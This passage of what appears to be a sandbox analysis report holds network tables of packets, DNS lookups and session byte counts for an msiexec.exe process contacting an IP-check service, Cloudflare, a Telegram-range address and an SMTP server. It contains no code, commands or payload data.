| Oct 14, 2024 09:12:18.570375919 CEST | 49800 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:18.988104105 CEST | 443 | 49802 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.989988089 CEST | 49802 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:18.990010023 CEST | 443 | 49802 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.118465900 CEST | 443 | 49802 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.118710995 CEST | 443 | 49802 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.118848085 CEST | 49802 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:19.119079113 CEST | 49802 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:19.122463942 CEST | 49800 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:19.123595953 CEST | 49808 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:19.128007889 CEST | 80 | 49800 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.128057957 CEST | 49800 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:19.128448009 CEST | 80 | 49808 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.128521919 CEST | 49808 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:19.128623962 CEST | 49808 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:19.133357048 CEST | 80 | 49808 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.622350931 CEST | 80 | 49808 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.623522997 CEST | 49812 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:19.623552084 CEST | 443 | 49812 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.624001026 CEST | 49812 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:19.624214888 CEST | 49812 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:19.624228001 CEST | 443 | 49812 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:19.664123058 CEST | 49808 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:20.100596905 CEST | 443 | 49812 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.103559971 CEST | 49812 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:20.103575945 CEST | 443 | 49812 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.226279020 CEST | 443 | 49812 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.226506948 CEST | 443 | 49812 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.226564884 CEST | 49812 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:20.226839066 CEST | 49812 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:20.229708910 CEST | 49808 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:20.230606079 CEST | 49816 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:20.235276937 CEST | 80 | 49808 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.235347033 CEST | 49808 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:20.235424995 CEST | 80 | 49816 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.235493898 CEST | 49816 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:20.235567093 CEST | 49816 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:20.240483046 CEST | 80 | 49816 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.709753990 CEST | 80 | 49816 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.710860014 CEST | 49821 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:20.710906029 CEST | 443 | 49821 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.710995913 CEST | 49821 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:20.711425066 CEST | 49821 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:20.711461067 CEST | 443 | 49821 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:20.757869005 CEST | 49816 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:21.205307007 CEST | 443 | 49821 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.206782103 CEST | 49821 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:21.206825972 CEST | 443 | 49821 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.359824896 CEST | 443 | 49821 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.360049963 CEST | 443 | 49821 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.360120058 CEST | 49821 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:21.360369921 CEST | 49821 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:21.387588024 CEST | 49816 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:21.393210888 CEST | 80 | 49816 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.393274069 CEST | 49816 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:21.395117998 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:21.395145893 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.395201921 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:21.395572901 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:21.395586967 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.052506924 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.052586079 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:22.054234028 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:22.054240942 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.054725885 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.066978931 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:22.111409903 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.311306953 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.311520100 CEST | 443 | 49827 | 149.154.167.220 | 192.168.2.4 |
| Oct 14, 2024 09:12:22.311585903 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:22.313596964 CEST | 49827 | 443 | 192.168.2.4 | 149.154.167.220 |
| Oct 14, 2024 09:12:28.828576088 CEST | 49762 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:29.093158960 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:29.098120928 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:29.098208904 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:29.837857962 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:29.838051081 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:29.843002081 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.060738087 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.060990095 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:30.289165020 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:30.386837006 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.386914968 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:30.387809038 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.387928963 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.580526114 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.580962896 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:30.585810900 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.781115055 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.781133890 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.781146049 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.781152964 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:30.781254053 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:30.783412933 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:30.788316965 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.219680071 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.219809055 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.219896078 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:31.222852945 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:31.429858923 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:31.458869934 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.458944082 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:31.459331036 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.459464073 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.652228117 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.652529001 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:31.657577991 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.850452900 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:31.850883961 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:31.855761051 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.074440002 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.082768917 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.087707996 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.283174038 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.283409119 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.288336992 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.488338947 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.488759995 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.493623018 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.686764002 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.687603951 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.687603951 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.687771082 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.687771082 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.687793970 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.692622900 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692637920 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692650080 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692671061 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692682981 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692816973 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692877054 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692888975 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692900896 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.692912102 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.896795988 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.897504091 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Oct 14, 2024 09:12:32.903305054 CEST | 587 | 49873 | 213.165.67.118 | 192.168.2.4 |
| Oct 14, 2024 09:12:32.903412104 CEST | 49873 | 587 | 192.168.2.4 | 213.165.67.118 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 14, 2024 09:12:05.972544909 CEST | 56875 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 14, 2024 09:12:05.979734898 CEST | 53 | 56875 | 1.1.1.1 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.096993923 CEST | 53852 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 14, 2024 09:12:07.104625940 CEST | 53 | 53852 | 1.1.1.1 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.959350109 CEST | 55639 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 14, 2024 09:12:10.966128111 CEST | 53 | 55639 | 1.1.1.1 | 192.168.2.4 |
| Oct 14, 2024 09:12:11.982721090 CEST | 63314 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 14, 2024 09:12:11.992209911 CEST | 53 | 63314 | 1.1.1.1 | 192.168.2.4 |
| Oct 14, 2024 09:12:21.387521029 CEST | 53373 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 14, 2024 09:12:21.394571066 CEST | 53 | 53373 | 1.1.1.1 | 192.168.2.4 |
| Oct 14, 2024 09:12:29.085366964 CEST | 56791 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 14, 2024 09:12:29.092536926 CEST | 53 | 56791 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 14, 2024 09:12:05.972544909 CEST | 192.168.2.4 | 1.1.1.1 | 0x64f9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Oct 14, 2024 09:12:07.096993923 CEST | 192.168.2.4 | 1.1.1.1 | 0x5455 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Oct 14, 2024 09:12:10.959350109 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1a1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Oct 14, 2024 09:12:11.982721090 CEST | 192.168.2.4 | 1.1.1.1 | 0xda4d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Oct 14, 2024 09:12:21.387521029 CEST | 192.168.2.4 | 1.1.1.1 | 0x98bd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Oct 14, 2024 09:12:29.085366964 CEST | 192.168.2.4 | 1.1.1.1 | 0xd2e | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 14, 2024 09:12:05.979734898 CEST | 1.1.1.1 | 192.168.2.4 | 0x64f9 | No error (0) | 142.250.185.110 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:07.104625940 CEST | 1.1.1.1 | 192.168.2.4 | 0x5455 | No error (0) | 142.250.185.97 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:10.966128111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1a1 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:10.966128111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1a1 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:10.966128111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1a1 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:10.966128111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1a1 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:10.966128111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1a1 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:10.966128111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1a1 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:11.992209911 CEST | 1.1.1.1 | 192.168.2.4 | 0xda4d | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:11.992209911 CEST | 1.1.1.1 | 192.168.2.4 | 0xda4d | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:21.394571066 CEST | 1.1.1.1 | 192.168.2.4 | 0x98bd | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:29.092536926 CEST | 1.1.1.1 | 192.168.2.4 | 0xd2e | No error (0) | 213.165.67.118 | A (IP address) | IN (0x0001) | false | ||
| Oct 14, 2024 09:12:29.092536926 CEST | 1.1.1.1 | 192.168.2.4 | 0xd2e | No error (0) | 213.165.67.102 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49744 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:10.978410959 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:11.444911003 CEST | 320 | IN | |
| Oct 14, 2024 09:12:11.449043036 CEST | 127 | OUT | |
| Oct 14, 2024 09:12:11.559118032 CEST | 320 | IN | |
| Oct 14, 2024 09:12:12.768369913 CEST | 127 | OUT | |
| Oct 14, 2024 09:12:12.878074884 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49762 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:13.518816948 CEST | 127 | OUT | |
| Oct 14, 2024 09:12:14.017910004 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49770 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:14.657296896 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:15.151238918 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.4 | 49781 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:15.784436941 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:16.258533001 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.4 | 49788 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:16.940207005 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:17.414257050 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.4 | 49800 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:18.050544977 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:18.514950991 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.4 | 49808 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:19.128623962 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:19.622350931 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.4 | 49816 | 193.122.130.0 | 80 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Oct 14, 2024 09:12:20.235567093 CEST | 151 | OUT | |
| Oct 14, 2024 09:12:20.709753990 CEST | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49736 | 142.250.185.110 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:06 UTC | 208 | OUT | |
| 2024-10-14 07:12:07 UTC | 1610 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49737 | 142.250.185.97 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:07 UTC | 250 | OUT | |
| 2024-10-14 07:12:10 UTC | 4889 | IN | |
| 2024-10-14 07:12:10 UTC | 4889 | IN | |
| 2024-10-14 07:12:10 UTC | 4889 | IN | |
| 2024-10-14 07:12:10 UTC | 34 | IN | |
| 2024-10-14 07:12:10 UTC | 1320 | IN | |
| 2024-10-14 07:12:10 UTC | 1390 | IN | |
| 2024-10-14 07:12:10 UTC | 1390 | IN | |
| 2024-10-14 07:12:10 UTC | 1390 | IN | |
| 2024-10-14 07:12:10 UTC | 1390 | IN | |
| 2024-10-14 07:12:10 UTC | 1390 | IN | |
| 2024-10-14 07:12:10 UTC | 1390 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:12 UTC | 84 | OUT | |
| 2024-10-14 07:12:12 UTC | 708 | IN | |
| 2024-10-14 07:12:12 UTC | 340 | IN | |
| 2024-10-14 07:12:12 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:13 UTC | 60 | OUT | |
| 2024-10-14 07:12:13 UTC | 708 | IN | |
| 2024-10-14 07:12:13 UTC | 340 | IN | |
| 2024-10-14 07:12:13 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.4 | 49768 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:14 UTC | 60 | OUT | |
| 2024-10-14 07:12:14 UTC | 706 | IN | |
| 2024-10-14 07:12:14 UTC | 340 | IN | |
| 2024-10-14 07:12:14 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.4 | 49775 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:15 UTC | 84 | OUT | |
| 2024-10-14 07:12:15 UTC | 704 | IN | |
| 2024-10-14 07:12:15 UTC | 340 | IN | |
| 2024-10-14 07:12:15 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.4 | 49783 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:16 UTC | 60 | OUT | |
| 2024-10-14 07:12:16 UTC | 702 | IN | |
| 2024-10-14 07:12:16 UTC | 340 | IN | |
| 2024-10-14 07:12:16 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.4 | 49794 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:17 UTC | 84 | OUT | |
| 2024-10-14 07:12:18 UTC | 704 | IN | |
| 2024-10-14 07:12:18 UTC | 340 | IN | |
| 2024-10-14 07:12:18 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 8 | 192.168.2.4 | 49802 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:18 UTC | 60 | OUT | |
| 2024-10-14 07:12:19 UTC | 708 | IN | |
| 2024-10-14 07:12:19 UTC | 340 | IN | |
| 2024-10-14 07:12:19 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 9 | 192.168.2.4 | 49812 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:20 UTC | 84 | OUT | |
| 2024-10-14 07:12:20 UTC | 716 | IN | |
| 2024-10-14 07:12:20 UTC | 340 | IN | |
| 2024-10-14 07:12:20 UTC | 5 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 10 | 192.168.2.4 | 49821 | 188.114.96.3 | 443 | 7824 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-10-14 07:12:21 UTC | 60 | OUT | |
| 2024-10-14 07:12:21 UTC | 710 | IN | |
| 2024-10-14 07:12:21 UTC | 340 | IN | |
